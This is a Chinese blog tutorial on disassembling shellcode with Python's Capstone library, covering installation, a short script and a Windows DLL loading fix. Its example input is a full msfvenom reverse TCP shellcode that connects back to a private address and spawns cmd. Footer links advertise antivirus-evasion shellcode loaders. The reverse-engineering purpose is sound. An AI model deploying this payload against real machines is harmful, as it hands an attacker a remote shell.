Python使用Python将Shellcode转换成汇编

Posted 17bdw随手笔记

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Python使用Python将Shellcode转换成汇编相关的知识,希望对你有一定的参考价值。

1、介绍

需要多少行代码转换hex成反汇编呢?
多亏了Python的Capstone库,做这件事只需要五行。
在二进制分析中,进行Exploit开发或逆向工程时,需要快速将十六进制的Shellcode反编译成反汇编。你可以使用像OllyDbg或IDA Pro这样的反编译工具,但如果你不想使用一个成熟的反编译工具执行这个小任务,那么下面的Python代码将有助于你把Shellcode转换成反汇编形式

如果你还没有安装capstone,那么你需要使用以下方法进行安装:

2、安装

2.1、基于Debian

使用以下命令下载并安装。
Note:在kali Linux已经有了。

 apt-get install python-capstone

2.2、基于Windows

windows需要下载以下的MSI文件后运行图形化向导进行安装:
32 bit

https://github.com/aquynh/capstone/releases/download/3.0.5-rc2/capstone-3.0.5-rc2-python-win32.msi

64 Bit

https://github.com/aquynh/capstone/releases/download/3.0.5-rc2/capstone-3.0.5-rc2-python-win64.msi

3、示例

这个例子是从msfvenom摘出来的反向TCP连接shellcode

#!/usr/bin/env python
from capstone import *

shellcode = ""
shellcode += "\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b"
shellcode += "\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7"
shellcode += "\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf"
shellcode += "\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c"
shellcode += "\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\\x01"
shellcode += "\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31"
shellcode += "\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d"
shellcode += "\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66"
shellcode += "\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0"
shellcode += "\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f"
shellcode += "\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x68\\x33\\x32\\x00\\x00\\x68"
shellcode += "\\x77\\x73\\x32\\x5f\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\xb8"
shellcode += "\\x90\\x01\\x00\\x00\\x29\\xc4\\x54\\x50\\x68\\x29\\x80\\x6b\\x00"
shellcode += "\\xff\\xd5\\x50\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\x68\\xea\\x0f"
shellcode += "\\xdf\\xe0\\xff\\xd5\\x97\\x6a\\x05\\x68\\xc0\\xa8\\x74\\x80\\x68"
shellcode += "\\x02\\x00\\x1f\\x90\\x89\\xe6\\x6a\\x10\\x56\\x57\\x68\\x99\\xa5"
shellcode += "\\x74\\x61\\xff\\xd5\\x85\\xc0\\x74\\x0c\\xff\\x4e\\x08\\x75\\xec"
shellcode += "\\x68\\xf0\\xb5\\xa2\\x56\\xff\\xd5\\x68\\x63\\x6d\\x64\\x00\\x89"
shellcode += "\\xe3\\x57\\x57\\x57\\x31\\xf6\\x6a\\x12\\x59\\x56\\xe2\\xfd\\x66"
shellcode += "\\xc7\\x44\\x24\\x3c\\x01\\x01\\x8d\\x44\\x24\\x10\\xc6\\x00\\x44"
shellcode += "\\x54\\x50\\x56\\x56\\x56\\x46\\x56\\x4e\\x56\\x56\\x53\\x56\\x68"
shellcode += "\\x79\\xcc\\x3f\\x86\\xff\\xd5\\x89\\xe0\\x4e\\x56\\x46\\xff\\x30"
shellcode += "\\x68\\x08\\x87\\x1d\\x60\\xff\\xd5\\xbb\\xaa\\xc5\\xe2\\x5d\\x68"
shellcode += "\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0"
shellcode += "\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x53\\xff\\xd5"

md = Cs(CS_ARCH_X86, CS_MODE_32)
for i in md.disasm(shellcode, 0x00):
print("0x%x:\\t%s\\t%s" %(i.address, i.mnemonic, i.op_str))

代码解释:

md = Cs(CS_ARCH_X86, CS_MODE_32): 初始化类,给两个参数(硬件架构和硬件模式)
for i in md.disasm(shellcode, 0x00):  disasm 反汇编这段HEX, 它的参数是shellcode和起始地址。
print(“0x%x:\\t%s\\t%s” %(i.address, i.mnemonic, i.op_str)):打印地址和操作数。

4、结果

保存上述代码并执行,下面的屏幕截图显示了用Python脚本输出十六进制(shellcode)的汇编

图:用简单的Python脚本将HEX转换成反汇编

5、实践部分

我在安装capstone的时候遇到了一个错误
错误信息如下:

Traceback (most recent call last):
  File "sl.py", line 2, in <module>
    from capstone import *
  File "C:\\Python27\\lib\\site-packages\\capstone\\__init__.py", line 249, in <module>
    raise ImportError("ERROR: fail to load the dynamic library.")
ImportError: ERROR: fail to load the dynamic library.

一路往下Debug,最后发现是ctypes加载DLL的时候报错了,不知道为何。

C:\\Python27\\Lib\\site-packages\\capstone\\__init__.py

于是我手动把210行代码lib路径改成DLL的绝对路径

    _lib = "capstone.dll" # 修改前
    _lib = "C:\\\\Python27\\\\lib\\\\site-packages\\\\capstone\\\\lib\\\\capstone.dll" # 修改后

修改后的代码如下:

if sys.platform == \'darwin\':
    _lib = "libcapstone.dylib"
elif sys.platform in (\'win32\', \'cygwin\'):
    _lib = "C:\\\\Python27\\\\lib\\\\site-packages\\\\capstone\\\\lib\\\\capstone.dll"
else:
    _lib = "libcapstone.so"

6、实践运行后的结果

7、参考

https://haiderm.com/convert-hex-assembly-using-simple-python-script/

以上是关于Python使用Python将Shellcode转换成汇编的主要内容,如果未能解决你的问题,请参考以下文章

python操作一段shellcode遇到的问题bytes 转义符问题

python操作一段shellcode遇到的问题bytes 转义符问题

python操作一段shellcode遇到的问题bytes 转义符问题

渗透测试笔记之Python免杀——两行代码实现免杀!VT查杀率:10/68(思路:将ShellCode和Loader一起分离免杀)

[源码]Python免杀ShellCode加载器(Cobaltstrike/Metasploit)

python Invoke-Shellcode.py